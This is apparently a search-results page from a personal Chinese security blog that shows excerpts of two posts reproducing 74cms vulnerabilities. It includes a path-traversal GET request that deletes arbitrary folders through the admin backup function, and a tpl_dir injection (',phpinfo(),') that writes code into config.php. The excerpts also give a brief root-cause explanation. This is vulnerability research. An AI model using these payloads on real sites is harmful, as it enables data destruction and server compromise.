TypechoJoeTheme

K.Fire's Blog

K.Fire

没有勇敢的工作
只有困难的打工人
网站页面
搜索到 2 篇与 74cms 的结果
2020-03-06

74cms v4.2.3 任意文件夹删除

74cms v4.2.3 任意文件夹删除
概述后台删除备份文件时传入name参数可控 导致可任意文件夹删除。复现环境:php 5.6 + apache + 74cms v4.2.3漏洞复现删除74cms同目录下test文件夹(需要登录)GET /74cms/index.php?m=admin&c=database&a=del&name=/../../../../test/ HTTP/1.1 Host: 192.161.15.5 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.66 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exch...
K.Fire
2020-03-06

分享

135 阅读
0 评论
2020年03月06日
135 阅读
0 评论
2020-03-06

74cms 后台文件写入导致的代码执行复现

74cms 后台文件写入导致的代码执行复现
概述后台更换风格模板的时候,未对参数 tpl_dir 的值进行严格过滤,导致危险的代码可以插入到配置文件中,进而导致任意命令执行。影响:74cms v4.2.1-v4.2.129复现环境:php 5.6 + apache + 74cms v4.2.111漏洞复现/index.php?m=admin&c=tpl&a=set&tpl_dir=',phpinfo(),' 影响文件 /Application/Home/Conf/config.php形成原理\Application\Admin\Controller\TplController.class.php\Application\Common\Controller\BackendController.class.phpupdate_config 函数把传进来的参数进行组合成所需的配置信息,最后用 file_put_contents 函数把配置信息写入到config.php 文件中。
K.Fire
2020-03-06

分享

57 阅读
0 评论
2020年03月06日
57 阅读
0 评论